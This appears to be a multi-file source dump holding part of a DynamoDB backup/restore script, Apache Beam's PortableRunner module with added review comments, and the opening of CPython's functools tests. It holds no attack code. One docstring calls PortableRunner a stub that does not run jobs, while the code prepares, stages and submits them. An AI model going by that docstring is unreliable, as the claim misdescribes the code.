            matching_backup_tables.append(args.srcTable)
        if len(matching_backup_tables) == 0:
            logging.info("No matching tables found. Nothing to do.")
            sys.exit(0)
        else:
            logging.info("Found " + str(len(matching_backup_tables)) +
                         " table(s) in DynamoDB host to backup: " +
                         ", ".join(matching_backup_tables))

        try:
            # NOTE(review): ``args.read_capacity`` does not exist (the flag is
            # --readCapacity -> args.readCapacity), so these calls raise
            # AttributeError and control always falls into the threaded-queue
            # path below -- the same happens when srcTable is None (tag mode)
            # via ``args.srcTable.find``.  Confirm this routing is intended.
            if args.srcTable.find("*") == -1:
                do_backup(conn, args.read_capacity, tableQueue=None)
            else:
                do_backup(conn, args.read_capacity, matching_backup_tables)
        except AttributeError:
            # Didn't specify srcTable if we get here
            q = Queue()
            threads = []

            # Spin up a fixed pool of backup workers fed by the queue.
            for i in range(MAX_NUMBER_BACKUP_WORKERS):
                t = threading.Thread(target=do_backup, args=(conn, args.readCapacity),
                                     kwargs={"tableQueue": q})
                t.start()
                threads.append(t)
                time.sleep(THREAD_START_DELAY)

            for table in matching_backup_tables:
                q.put(table)

            q.join()

            # One None sentinel per worker tells it to exit.
            for i in range(MAX_NUMBER_BACKUP_WORKERS):
                q.put(None)

            for t in threads:
                t.join()

            try:
                logging.info("Backup of table(s) " + args.srcTable + " completed!")
            except (NameError, TypeError):
                logging.info("Backup of table(s) " +
                             ", ".join(matching_backup_tables) + " completed!")

        if args.archive:
            if args.tag:
                # One archive per table when tables were selected by tag.
                for table in matching_backup_tables:
                    dump_path = args.dumpPath + os.sep + table
                    did_archive, archive_file = do_archive(args.archive, dump_path)
                    if args.bucket and did_archive:
                        do_put_bucket_object(args.profile,
                                             args.region,
                                             args.bucket,
                                             archive_file)
            else:
                did_archive, archive_file = do_archive(args.archive, args.dumpPath)
                if args.bucket and did_archive:
                    do_put_bucket_object(args.profile, args.region, args.bucket, archive_file)

    elif args.mode == "restore":
        if args.destTable is not None:
            dest_table = args.destTable
        else:
            dest_table = args.srcTable

        # If backups are in S3 download and extract the backup to use during restoration
        if args.bucket:
            do_get_s3_archive(args.profile, args.region, args.bucket, args.srcTable, args.archive)

        if dest_table.find("*") != -1:
            matching_destination_tables = get_table_name_matches(conn, dest_table, prefix_separator)
            delete_str = ": " if args.dataOnly else " to be deleted: "
            logging.info(
                "Found " + str(len(matching_destination_tables)) +
                " table(s) in DynamoDB host" + delete_str +
                ", ".join(matching_destination_tables))

            threads = []
            for table in matching_destination_tables:
                t = threading.Thread(target=delete_table, args=(conn, sleep_interval, table))
                threads.append(t)
                t.start()
                time.sleep(THREAD_START_DELAY)

            for thread in threads:
                thread.join()

            matching_restore_tables = get_restore_table_matches(args.srcTable, prefix_separator)
            logging.info(
                "Found " + str(len(matching_restore_tables)) +
                " table(s) in " + args.dumpPath + " to restore: " + ", ".join(
                    matching_restore_tables))

            threads = []
            for source_table in matching_restore_tables:
                if args.srcTable == "*":
                    t = threading.Thread(target=do_restore,
                                         args=(conn,
                                               sleep_interval,
                                               source_table,
                                               source_table,
                                               args.writeCapacity))
                else:
                    t = threading.Thread(target=do_restore,
                                         args=(conn, sleep_interval, source_table,
                                               change_prefix(source_table,
                                                             args.srcTable,
                                                             dest_table,
                                                             prefix_separator),
                                               args.writeCapacity))
                threads.append(t)
                t.start()
                time.sleep(THREAD_START_DELAY)

            for thread in threads:
                thread.join()

            logging.info("Restore of table(s) " + args.srcTable + " to " +
                         dest_table + " completed!")
        else:
            delete_table(conn, sleep_interval, dest_table)
            do_restore(conn, sleep_interval, args.srcTable, dest_table, args.writeCapacity)
    elif args.mode == "empty":
        if args.srcTable.find("*") != -1:
            matching_backup_tables = get_table_name_matches(conn, args.srcTable, prefix_separator)
            logging.info("Found " + str(len(matching_backup_tables)) +
                         " table(s) in DynamoDB host to empty: " +
                         ", ".join(matching_backup_tables))

            threads = []
            for table in matching_backup_tables:
                t = threading.Thread(target=do_empty, args=(conn, table))
                threads.append(t)
                t.start()
                time.sleep(THREAD_START_DELAY)

            for thread in threads:
                thread.join()

            logging.info("Empty of table(s) " + args.srcTable + " completed!")
        else:
            do_empty(conn, args.srcTable)
# Script entrypoint: delegate to main() when run directly.
if __name__ == "__main__":
    main()
|
portable_runner.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import functools
import itertools
import logging
import sys
import threading
import time
import grpc
from apache_beam import version as beam_version
from apache_beam.metrics import metric
from apache_beam.metrics.execution import MetricResult
from apache_beam.options.pipeline_options import DebugOptions
from apache_beam.options.pipeline_options import PortableOptions
from apache_beam.options.pipeline_options import SetupOptions
from apache_beam.options.pipeline_options import StandardOptions
from apache_beam.portability import common_urns
from apache_beam.portability.api import beam_job_api_pb2
from apache_beam.runners import runner
from apache_beam.runners.job import utils as job_utils
from apache_beam.runners.portability import fn_api_runner_transforms
from apache_beam.runners.portability import job_server
from apache_beam.runners.portability import portable_metrics
from apache_beam.runners.portability import portable_stager
from apache_beam.runners.worker import sdk_worker_main
from apache_beam.runners.worker import worker_pool_main
from apache_beam.transforms import environments
# Public API of this module.
__all__ = ['PortableRunner']

# Maps Beam Job API message importance levels to stdlib logging levels,
# used when relaying job-service messages to the local log.
MESSAGE_LOG_LEVELS = {
    beam_job_api_pb2.JobMessage.MESSAGE_IMPORTANCE_UNSPECIFIED: logging.INFO,
    beam_job_api_pb2.JobMessage.JOB_MESSAGE_DEBUG: logging.DEBUG,
    beam_job_api_pb2.JobMessage.JOB_MESSAGE_DETAILED: logging.DEBUG,
    beam_job_api_pb2.JobMessage.JOB_MESSAGE_BASIC: logging.INFO,
    beam_job_api_pb2.JobMessage.JOB_MESSAGE_WARNING: logging.WARNING,
    beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR: logging.ERROR,
}

# Job states after which no further state transitions can occur; reaching
# one of these ends wait_until_finish().
TERMINAL_STATES = [
    beam_job_api_pb2.JobState.DONE,
    beam_job_api_pb2.JobState.STOPPED,
    beam_job_api_pb2.JobState.FAILED,
    beam_job_api_pb2.JobState.CANCELLED,
]

# User-friendly aliases for environment types; LOOPBACK is implemented as
# an EXTERNAL environment whose worker pool runs in this process.
ENV_TYPE_ALIASES = {'LOOPBACK': 'EXTERNAL'}
class PortableRunner(runner.PipelineRunner):
  """
  Experimental: No backward compatibility guaranteed.
  A BeamRunner that executes Python pipelines via the Beam Job API.

  This runner is a stub and does not run the actual job.
  This runner schedules the job on a job service. The responsibility of
  running and managing the job lies with the job service used.
  """

  def __init__(self):
    # Lazily-created, shared Dockerized job server (see default_job_server).
    self._dockerized_job_server = None

  @staticmethod
  def default_docker_image():
    """Return the default SDK harness Docker image name for this SDK
    version and the current Python major.minor version."""
    sdk_version = beam_version.__version__
    version_suffix = '.'.join([str(i) for i in sys.version_info[0:2]])
    logging.warning('Make sure that locally built Python SDK docker image '
                    'has Python %d.%d interpreter.' % (
                        sys.version_info[0], sys.version_info[1]))

    image = ('apachebeam/python{version_suffix}_sdk:{tag}'.format(
        version_suffix=version_suffix, tag=sdk_version))
    logging.info(
        'Using Python SDK docker image: %s. If the image is not '
        'available at local, we will try to pull from hub.docker.com'
        % (image))
    return image

  @staticmethod
  def _create_environment(options):
    """Build the Environment proto wrapper selected by ``environment_type``.

    Accepts either a full URN (``beam:env:...``), a symbolic name looked up
    on ``common_urns.environments``, or an alias from ENV_TYPE_ALIASES;
    defaults to DOCKER when unset.  Raises ValueError for unknown types.
    """
    portable_options = options.view_as(PortableOptions)
    # Do not set a Runner. Otherwise this can cause problems in Java's
    # PipelineOptions, i.e. ClassNotFoundException, if the corresponding Runner
    # does not exist in the Java SDK. In portability, the entry point is clearly
    # defined via the JobService.
    portable_options.view_as(StandardOptions).runner = None
    environment_type = portable_options.environment_type
    if not environment_type:
      environment_urn = common_urns.environments.DOCKER.urn
    elif environment_type.startswith('beam:env:'):
      environment_urn = environment_type
    else:
      # e.g. handle LOOPBACK -> EXTERNAL
      environment_type = ENV_TYPE_ALIASES.get(environment_type,
                                              environment_type)
      try:
        environment_urn = getattr(common_urns.environments,
                                  environment_type).urn
      except AttributeError:
        raise ValueError(
            'Unknown environment type: %s' % environment_type)

    env_class = environments.Environment.get_env_cls_from_urn(environment_urn)
    return env_class.from_options(portable_options)

  def default_job_server(self, portable_options):
    """Return (creating on first use) a Dockerized job server that is
    stopped automatically on interpreter exit."""
    # TODO Provide a way to specify a container Docker URL
    # https://issues.apache.org/jira/browse/BEAM-6328
    if not self._dockerized_job_server:
      self._dockerized_job_server = job_server.StopOnExitJobServer(
          job_server.DockerizedJobServer())
    return self._dockerized_job_server

  def create_job_service(self, options):
    """Start and return the job service selected by the pipeline options:
    embedded, external (at ``job_endpoint``), or the default Docker one."""
    job_endpoint = options.view_as(PortableOptions).job_endpoint
    if job_endpoint:
      if job_endpoint == 'embed':
        server = job_server.EmbeddedJobServer()
      else:
        job_server_timeout = options.view_as(PortableOptions).job_server_timeout
        server = job_server.ExternalJobServer(job_endpoint, job_server_timeout)
    else:
      server = self.default_job_server(options)
    return server.start()

  def run_pipeline(self, pipeline, options):
    """Translate *pipeline* to a runner-API proto, pre-optimize it, stage
    artifacts, and submit it to the job service.

    Returns a PipelineResult wrapping the job's state/message streams.
    """
    portable_options = options.view_as(PortableOptions)

    # TODO: https://issues.apache.org/jira/browse/BEAM-5525
    # portable runner specific default
    if options.view_as(SetupOptions).sdk_location == 'default':
      options.view_as(SetupOptions).sdk_location = 'container'

    # This is needed as we start a worker server if one is requested
    # but none is provided.
    if portable_options.environment_type == 'LOOPBACK':
      use_loopback_process_worker = options.view_as(
          DebugOptions).lookup_experiment(
              'use_loopback_process_worker', False)
      portable_options.environment_config, server = (
          worker_pool_main.BeamFnExternalWorkerPoolServicer.start(
              sdk_worker_main._get_worker_count(options),
              state_cache_size=sdk_worker_main._get_state_cache_size(options),
              use_process=use_loopback_process_worker))
      # The in-process worker pool must be stopped when the job ends.
      cleanup_callbacks = [functools.partial(server.stop, 1)]
    else:
      cleanup_callbacks = []

    proto_pipeline = pipeline.to_runner_api(
        default_environment=PortableRunner._create_environment(
            portable_options))

    # Some runners won't detect the GroupByKey transform unless it has no
    # subtransforms. Remove all sub-transforms until BEAM-4605 is resolved.
    for _, transform_proto in list(
        proto_pipeline.components.transforms.items()):
      if transform_proto.spec.urn == common_urns.primitives.GROUP_BY_KEY.urn:
        for sub_transform in transform_proto.subtransforms:
          del proto_pipeline.components.transforms[sub_transform]
        del transform_proto.subtransforms[:]

    # Preemptively apply combiner lifting, until all runners support it.
    # Also apply sdf expansion.
    # These optimizations commute and are idempotent.
    pre_optimize = options.view_as(DebugOptions).lookup_experiment(
        'pre_optimize', 'lift_combiners,expand_sdf').lower()
    if not options.view_as(StandardOptions).streaming:
      flink_known_urns = frozenset([
          common_urns.composites.RESHUFFLE.urn,
          common_urns.primitives.IMPULSE.urn,
          common_urns.primitives.FLATTEN.urn,
          common_urns.primitives.GROUP_BY_KEY.urn])
      if pre_optimize == 'none':
        pass
      elif pre_optimize == 'all':
        proto_pipeline = fn_api_runner_transforms.optimize_pipeline(
            proto_pipeline,
            phases=[fn_api_runner_transforms.annotate_downstream_side_inputs,
                    fn_api_runner_transforms.annotate_stateful_dofns_as_roots,
                    fn_api_runner_transforms.fix_side_input_pcoll_coders,
                    fn_api_runner_transforms.lift_combiners,
                    fn_api_runner_transforms.expand_sdf,
                    fn_api_runner_transforms.fix_flatten_coders,
                    # fn_api_runner_transforms.sink_flattens,
                    fn_api_runner_transforms.greedily_fuse,
                    fn_api_runner_transforms.read_to_impulse,
                    fn_api_runner_transforms.extract_impulse_stages,
                    fn_api_runner_transforms.remove_data_plane_ops,
                    fn_api_runner_transforms.sort_stages],
            known_runner_urns=flink_known_urns)
      else:
        phases = []
        for phase_name in pre_optimize.split(','):
          # For now, these are all we allow.
          if phase_name in ('lift_combiners', 'expand_sdf'):
            phases.append(getattr(fn_api_runner_transforms, phase_name))
          else:
            raise ValueError(
                'Unknown or inapplicable phase for pre_optimize: %s'
                % phase_name)
        proto_pipeline = fn_api_runner_transforms.optimize_pipeline(
            proto_pipeline,
            phases=phases,
            known_runner_urns=flink_known_urns,
            partial=True)

    job_service = self.create_job_service(options)

    # fetch runner options from job service
    # retries in case the channel is not ready
    def send_options_request(max_retries=5):
      num_retries = 0
      while True:
        try:
          # This reports channel is READY but connections may fail
          # Seems to be only an issue on Mac with port forwardings
          return job_service.DescribePipelineOptions(
              beam_job_api_pb2.DescribePipelineOptionsRequest(),
              timeout=portable_options.job_server_timeout)
        except grpc.FutureTimeoutError:
          # no retry for timeout errors
          raise
        except grpc._channel._Rendezvous as e:
          # NOTE(review): grpc._channel._Rendezvous is a private grpc API;
          # newer grpc versions expose grpc.RpcError instead -- confirm the
          # pinned grpc version before changing.
          num_retries += 1
          if num_retries > max_retries:
            raise e
          time.sleep(1)

    options_response = send_options_request()

    def add_runner_options(parser):
      # Registers each runner-reported option on the argparse parser so
      # user-specified runner options survive get_all_options().
      for option in options_response.options:
        try:
          # no default values - we don't want runner options
          # added unless they were specified by the user
          add_arg_args = {'action' : 'store', 'help' : option.description}
          if option.type == beam_job_api_pb2.PipelineOptionType.BOOLEAN:
            add_arg_args['action'] = 'store_true'\
              if option.default_value != 'true' else 'store_false'
          elif option.type == beam_job_api_pb2.PipelineOptionType.INTEGER:
            add_arg_args['type'] = int
          elif option.type == beam_job_api_pb2.PipelineOptionType.ARRAY:
            add_arg_args['action'] = 'append'
          parser.add_argument("--%s" % option.name, **add_arg_args)
        except Exception as e:
          # ignore runner options that are already present
          # only in this case is duplicate not treated as error
          if 'conflicting option string' not in str(e):
            raise
          logging.debug("Runner option '%s' was already added" % option.name)

    all_options = options.get_all_options(add_extra_args_fn=add_runner_options)
    # TODO: Define URNs for options.
    # convert int values: https://issues.apache.org/jira/browse/BEAM-5509
    p_options = {'beam:option:' + k + ':v1': (str(v) if type(v) == int else v)
                 for k, v in all_options.items()
                 if v is not None}
    prepare_response = job_service.Prepare(
        beam_job_api_pb2.PrepareJobRequest(
            job_name='job', pipeline=proto_pipeline,
            pipeline_options=job_utils.dict_to_struct(p_options)),
        timeout=portable_options.job_server_timeout)
    if prepare_response.artifact_staging_endpoint.url:
      # Stage local artifacts (e.g. the SDK and extra packages) with the
      # job service before running.
      stager = portable_stager.PortableStager(
          grpc.insecure_channel(prepare_response.artifact_staging_endpoint.url),
          prepare_response.staging_session_token)
      retrieval_token, _ = stager.stage_job_resources(
          options,
          staging_location='')
    else:
      retrieval_token = None

    try:
      state_stream = job_service.GetStateStream(
          beam_job_api_pb2.GetJobStateRequest(
              job_id=prepare_response.preparation_id),
          timeout=portable_options.job_server_timeout)
      # If there's an error, we don't always get it until we try to read.
      # Fortunately, there's always an immediate current state published.
      state_stream = itertools.chain(
          [next(state_stream)],
          state_stream)
      message_stream = job_service.GetMessageStream(
          beam_job_api_pb2.JobMessagesRequest(
              job_id=prepare_response.preparation_id),
          timeout=portable_options.job_server_timeout)
    except Exception:
      # TODO(BEAM-6442): Unify preparation_id and job_id for all runners.
      state_stream = message_stream = None

    # Run the job and wait for a result, we don't set a timeout here because
    # it may take a long time for a job to complete and streaming
    # jobs currently never return a response.
    run_response = job_service.Run(
        beam_job_api_pb2.RunJobRequest(
            preparation_id=prepare_response.preparation_id,
            retrieval_token=retrieval_token))

    if state_stream is None:
      # Fall back to job_id-keyed streams for runners that don't support
      # preparation_id-keyed streams (see TODO above).
      state_stream = job_service.GetStateStream(
          beam_job_api_pb2.GetJobStateRequest(
              job_id=run_response.job_id))
      message_stream = job_service.GetMessageStream(
          beam_job_api_pb2.JobMessagesRequest(
              job_id=run_response.job_id))

    return PipelineResult(job_service, run_response.job_id, message_stream,
                          state_stream, cleanup_callbacks)
class PortableMetrics(metric.MetricResults):
  """MetricResults backed by a Job API GetJobMetrics response."""

  def __init__(self, job_metrics_response):
    metrics = job_metrics_response.metrics
    # from_monitoring_infos presumably returns a (counters, distributions,
    # gauges) triple of {metric_key: value} mappings -- the zip in query()
    # relies on that structure; confirm against portable_metrics.
    self.attempted = portable_metrics.from_monitoring_infos(metrics.attempted)
    self.committed = portable_metrics.from_monitoring_infos(metrics.committed)

  @staticmethod
  def _combine(committed, attempted, filter):
    # NOTE(review): 'filter' shadows the builtin; kept as-is since callers
    # may pass it by keyword.
    all_keys = set(committed.keys()) | set(attempted.keys())
    return [
        MetricResult(key, committed.get(key), attempted.get(key))
        for key in all_keys
        if metric.MetricResults.matches(filter, key)
    ]

  def query(self, filter=None):
    """Return matching metrics as {COUNTERS: [...], DISTRIBUTIONS: [...],
    GAUGES: [...]}, pairing committed with attempted values per key."""
    counters, distributions, gauges = [
        self._combine(x, y, filter)
        for x, y in zip(self.committed, self.attempted)
    ]
    return {self.COUNTERS: counters,
            self.DISTRIBUTIONS: distributions,
            self.GAUGES: gauges}
class PipelineResult(runner.PipelineResult):
  """Result handle for a job submitted via the Beam Job API.

  Wraps the job service stubs plus the job's state and message streams,
  and runs any registered cleanup callbacks when the job terminates or is
  cancelled.
  """

  def __init__(self, job_service, job_id, message_stream, state_stream,
               cleanup_callbacks=()):
    super(PipelineResult, self).__init__(beam_job_api_pb2.JobState.UNSPECIFIED)
    self._job_service = job_service
    self._job_id = job_id
    self._messages = []
    self._message_stream = message_stream
    self._state_stream = state_stream
    self._cleanup_callbacks = cleanup_callbacks
    self._metrics = None

  def cancel(self):
    """Request cancellation from the job service, then run cleanup."""
    try:
      self._job_service.Cancel(beam_job_api_pb2.CancelJobRequest(
          job_id=self._job_id))
    finally:
      self._cleanup()

  @property
  def state(self):
    """Poll the job service for the current job state (also cached)."""
    runner_api_state = self._job_service.GetState(
        beam_job_api_pb2.GetJobStateRequest(job_id=self._job_id)).state
    self._state = self._runner_api_state_to_pipeline_state(runner_api_state)
    return self._state

  @staticmethod
  def _runner_api_state_to_pipeline_state(runner_api_state):
    # Job API state enum -> runner.PipelineState attribute of the same name.
    return getattr(runner.PipelineState,
                   beam_job_api_pb2.JobState.Enum.Name(runner_api_state))

  @staticmethod
  def _pipeline_state_to_runner_api_state(pipeline_state):
    return beam_job_api_pb2.JobState.Enum.Value(pipeline_state)

  def metrics(self):
    """Fetch job metrics from the job service (cached after first call)."""
    if not self._metrics:
      job_metrics_response = self._job_service.GetJobMetrics(
          beam_job_api_pb2.GetJobMetricsRequest(job_id=self._job_id))
      self._metrics = PortableMetrics(job_metrics_response)
    return self._metrics

  def _last_error_message(self):
    """Return the text of the last JOB_MESSAGE_ERROR seen, if any."""
    # Filter only messages with the "message_response" and error messages.
    messages = [m.message_response for m in self._messages
                if m.HasField('message_response')]
    error_messages = [m for m in messages
                      if m.importance ==
                      beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR]
    if error_messages:
      return error_messages[-1].message_text
    else:
      return 'unknown error'

  def wait_until_finish(self):
    """Block until the job reaches a terminal state.

    Job-service messages are drained and logged on a daemon thread while
    this thread consumes the state stream.  Raises RuntimeError if the job
    finishes in any terminal state other than DONE; always runs cleanup.
    """

    def read_messages():
      # Log each message and record it so _last_error_message() can report
      # the failure cause after the fact.
      for message in self._message_stream:
        if message.HasField('message_response'):
          logging.log(
              MESSAGE_LOG_LEVELS[message.message_response.importance],
              "%s",
              message.message_response.message_text)
        else:
          logging.info(
              "Job state changed to %s",
              self._runner_api_state_to_pipeline_state(
                  message.state_response.state))
        self._messages.append(message)

    t = threading.Thread(target=read_messages, name='wait_until_finish_read')
    t.daemon = True
    t.start()

    try:
      for state_response in self._state_stream:
        self._state = self._runner_api_state_to_pipeline_state(
            state_response.state)
        if state_response.state in TERMINAL_STATES:
          # Wait for any last messages.
          t.join(10)
          break
      if self._state != runner.PipelineState.DONE:
        raise RuntimeError(
            'Pipeline %s failed in state %s: %s' % (
                self._job_id, self._state, self._last_error_message()))
      return self._state
    finally:
      self._cleanup()

  def _cleanup(self):
    """Run every registered cleanup callback exactly once.

    All callbacks are attempted even if some fail; the last failure is
    re-raised after the callback list has been cleared.
    """
    # BUG FIX: the previous version set a boolean flag and then executed a
    # bare `raise` outside any `except` block, which raises
    # "RuntimeError: No active exception to re-raise" instead of the
    # callback's actual exception.  Keep the exception object and re-raise
    # it explicitly.
    last_exception = None
    for callback in self._cleanup_callbacks:
      try:
        callback()
      except Exception as exc:
        last_exception = exc
    self._cleanup_callbacks = ()
    if last_exception is not None:
      raise last_exception
|
test_functools.py | import abc
import builtins
import collections
import collections.abc
import copy
from itertools import permutations
import pickle
from random import choice
import sys
from test import support
import threading
import time
import typing
import unittest
import unittest.mock
from weakref import proxy
import contextlib
import functools
py_functools = support.import_fresh_module('functools', blocked=['_functools'])
c_functools = support.import_fresh_module('functools', fresh=['_functools'])
decimal = support.import_fresh_module('decimal', fresh=['_decimal'])
@contextlib.contextmanager
def replaced_module(name, replacement):
    """Temporarily install *replacement* as ``sys.modules[name]``.

    The previously registered module object is restored on exit, even if
    the body raises.
    """
    saved = sys.modules[name]
    sys.modules[name] = replacement
    try:
        yield
    finally:
        sys.modules[name] = saved
def capture(*args, **kw):
    """Return the received positional and keyword arguments unchanged,
    as an ``(args_tuple, kwargs_dict)`` pair."""
    captured = (args, kw)
    return captured
def signature(part):
    """Return the identifying state of a partial object as a 4-tuple:
    (wrapped callable, positional args, keyword args, instance dict)."""
    func = part.func
    positional = part.args
    keywords = part.keywords
    return (func, positional, keywords, part.__dict__)
class MyTuple(tuple):
    """Trivial tuple subclass used to verify that partial.__setstate__
    normalizes tuple subclasses back to plain tuples."""
    pass
class BadTuple(tuple):
    """Tuple subclass whose ``+`` misbehaves (returns a list), used to
    verify partial doesn't rely on subclass concatenation semantics."""
    def __add__(self, other):
        return list(self) + list(other)
class MyDict(dict):
    """Trivial dict subclass used to verify that partial.__setstate__
    normalizes dict subclasses back to plain dicts."""
    pass
class TestPartial:
    """Behavioral tests shared by the C and pure-Python ``partial``.

    Mixin: concrete subclasses supply ``partial`` (the implementation
    under test) and ``AllowPickle`` (a context manager arranging for
    pickling to resolve the right module).
    """

    def test_basic_examples(self):
        p = self.partial(capture, 1, 2, a=10, b=20)
        self.assertTrue(callable(p))
        self.assertEqual(p(3, 4, b=30, c=40),
                         ((1, 2, 3, 4), dict(a=10, b=30, c=40)))
        p = self.partial(map, lambda x: x*10)
        self.assertEqual(list(p([1,2,3,4])), [10, 20, 30, 40])

    def test_attributes(self):
        p = self.partial(capture, 1, 2, a=10, b=20)
        # attributes should be readable
        self.assertEqual(p.func, capture)
        self.assertEqual(p.args, (1, 2))
        self.assertEqual(p.keywords, dict(a=10, b=20))

    def test_argument_checking(self):
        self.assertRaises(TypeError, self.partial)  # need at least a func arg
        try:
            self.partial(2)()
        except TypeError:
            pass
        else:
            self.fail('First arg not checked for callability')

    def test_protection_of_callers_dict_argument(self):
        # a caller's dictionary should not be altered by partial
        def func(a=10, b=20):
            return a
        d = {'a':3}
        p = self.partial(func, a=5)
        self.assertEqual(p(**d), 3)
        self.assertEqual(d, {'a':3})
        p(b=7)
        self.assertEqual(d, {'a':3})

    def test_kwargs_copy(self):
        # Issue #29532: Altering a kwarg dictionary passed to a constructor
        # should not affect a partial object after creation
        d = {'a': 3}
        p = self.partial(capture, **d)
        self.assertEqual(p(), ((), {'a': 3}))
        d['a'] = 5
        self.assertEqual(p(), ((), {'a': 3}))

    def test_arg_combinations(self):
        # exercise special code paths for zero args in either partial
        # object or the caller
        p = self.partial(capture)
        self.assertEqual(p(), ((), {}))
        self.assertEqual(p(1,2), ((1,2), {}))
        p = self.partial(capture, 1, 2)
        self.assertEqual(p(), ((1,2), {}))
        self.assertEqual(p(3,4), ((1,2,3,4), {}))

    def test_kw_combinations(self):
        # exercise special code paths for no keyword args in
        # either the partial object or the caller
        p = self.partial(capture)
        self.assertEqual(p.keywords, {})
        self.assertEqual(p(), ((), {}))
        self.assertEqual(p(a=1), ((), {'a':1}))
        p = self.partial(capture, a=1)
        self.assertEqual(p.keywords, {'a':1})
        self.assertEqual(p(), ((), {'a':1}))
        self.assertEqual(p(b=2), ((), {'a':1, 'b':2}))
        # keyword args in the call override those in the partial object
        self.assertEqual(p(a=3, b=2), ((), {'a':3, 'b':2}))

    def test_positional(self):
        # make sure positional arguments are captured correctly
        for args in [(), (0,), (0,1), (0,1,2), (0,1,2,3)]:
            p = self.partial(capture, *args)
            expected = args + ('x',)
            got, empty = p('x')
            self.assertTrue(expected == got and empty == {})

    def test_keyword(self):
        # make sure keyword arguments are captured correctly
        for a in ['a', 0, None, 3.5]:
            p = self.partial(capture, a=a)
            expected = {'a':a,'x':None}
            empty, got = p(x=None)
            self.assertTrue(expected == got and empty == ())

    def test_no_side_effects(self):
        # make sure there are no side effects that affect subsequent calls
        p = self.partial(capture, 0, a=1)
        args1, kw1 = p(1, b=2)
        self.assertTrue(args1 == (0,1) and kw1 == {'a':1,'b':2})
        args2, kw2 = p()
        self.assertTrue(args2 == (0,) and kw2 == {'a':1})

    def test_error_propagation(self):
        def f(x, y):
            x / y
        self.assertRaises(ZeroDivisionError, self.partial(f, 1, 0))
        self.assertRaises(ZeroDivisionError, self.partial(f, 1), 0)
        self.assertRaises(ZeroDivisionError, self.partial(f), 1, 0)
        self.assertRaises(ZeroDivisionError, self.partial(f, y=0), 1)

    def test_weakref(self):
        f = self.partial(int, base=16)
        p = proxy(f)
        self.assertEqual(f.func, p.func)
        f = None
        self.assertRaises(ReferenceError, getattr, p, 'func')

    def test_with_bound_and_unbound_methods(self):
        data = list(map(str, range(10)))
        join = self.partial(str.join, '')
        self.assertEqual(join(data), '0123456789')
        join = self.partial(''.join)
        self.assertEqual(join(data), '0123456789')

    def test_nested_optimization(self):
        # partial-of-partial is flattened to a single level
        partial = self.partial
        inner = partial(signature, 'asdf')
        nested = partial(inner, bar=True)
        flat = partial(signature, 'asdf', bar=True)
        self.assertEqual(signature(nested), signature(flat))

    def test_nested_partial_with_attribute(self):
        # see issue 25137
        partial = self.partial
        def foo(bar):
            return bar
        p = partial(foo, 'first')
        p2 = partial(p, 'second')
        p2.new_attr = 'spam'
        self.assertEqual(p2.new_attr, 'spam')

    def test_repr(self):
        args = (object(), object())
        args_repr = ', '.join(repr(a) for a in args)
        kwargs = {'a': object(), 'b': object()}
        # kwargs repr order is not guaranteed, so accept either ordering
        kwargs_reprs = ['a={a!r}, b={b!r}'.format_map(kwargs),
                        'b={b!r}, a={a!r}'.format_map(kwargs)]
        if self.partial in (c_functools.partial, py_functools.partial):
            name = 'functools.partial'
        else:
            name = self.partial.__name__
        f = self.partial(capture)
        self.assertEqual(f'{name}({capture!r})', repr(f))
        f = self.partial(capture, *args)
        self.assertEqual(f'{name}({capture!r}, {args_repr})', repr(f))
        f = self.partial(capture, **kwargs)
        self.assertIn(repr(f),
                      [f'{name}({capture!r}, {kwargs_repr})'
                       for kwargs_repr in kwargs_reprs])
        f = self.partial(capture, *args, **kwargs)
        self.assertIn(repr(f),
                      [f'{name}({capture!r}, {args_repr}, {kwargs_repr})'
                       for kwargs_repr in kwargs_reprs])

    def test_recursive_repr(self):
        # self-referential partials must render as '...' not recurse forever
        if self.partial in (c_functools.partial, py_functools.partial):
            name = 'functools.partial'
        else:
            name = self.partial.__name__
        f = self.partial(capture)
        f.__setstate__((f, (), {}, {}))
        try:
            self.assertEqual(repr(f), '%s(...)' % (name,))
        finally:
            f.__setstate__((capture, (), {}, {}))
        f = self.partial(capture)
        f.__setstate__((capture, (f,), {}, {}))
        try:
            self.assertEqual(repr(f), '%s(%r, ...)' % (name, capture,))
        finally:
            f.__setstate__((capture, (), {}, {}))
        f = self.partial(capture)
        f.__setstate__((capture, (), {'a': f}, {}))
        try:
            self.assertEqual(repr(f), '%s(%r, a=...)' % (name, capture,))
        finally:
            f.__setstate__((capture, (), {}, {}))

    def test_pickle(self):
        with self.AllowPickle():
            f = self.partial(signature, ['asdf'], bar=[True])
            f.attr = []
            for proto in range(pickle.HIGHEST_PROTOCOL + 1):
                f_copy = pickle.loads(pickle.dumps(f, proto))
                self.assertEqual(signature(f_copy), signature(f))

    def test_copy(self):
        f = self.partial(signature, ['asdf'], bar=[True])
        f.attr = []
        f_copy = copy.copy(f)
        self.assertEqual(signature(f_copy), signature(f))
        # shallow copy shares the underlying containers
        self.assertIs(f_copy.attr, f.attr)
        self.assertIs(f_copy.args, f.args)
        self.assertIs(f_copy.keywords, f.keywords)

    def test_deepcopy(self):
        f = self.partial(signature, ['asdf'], bar=[True])
        f.attr = []
        f_copy = copy.deepcopy(f)
        self.assertEqual(signature(f_copy), signature(f))
        # deep copy duplicates the underlying containers
        self.assertIsNot(f_copy.attr, f.attr)
        self.assertIsNot(f_copy.args, f.args)
        self.assertIsNot(f_copy.args[0], f.args[0])
        self.assertIsNot(f_copy.keywords, f.keywords)
        self.assertIsNot(f_copy.keywords['bar'], f.keywords['bar'])

    def test_setstate(self):
        f = self.partial(signature)
        f.__setstate__((capture, (1,), dict(a=10), dict(attr=[])))
        self.assertEqual(signature(f),
                         (capture, (1,), dict(a=10), dict(attr=[])))
        self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
        f.__setstate__((capture, (1,), dict(a=10), None))
        self.assertEqual(signature(f), (capture, (1,), dict(a=10), {}))
        self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
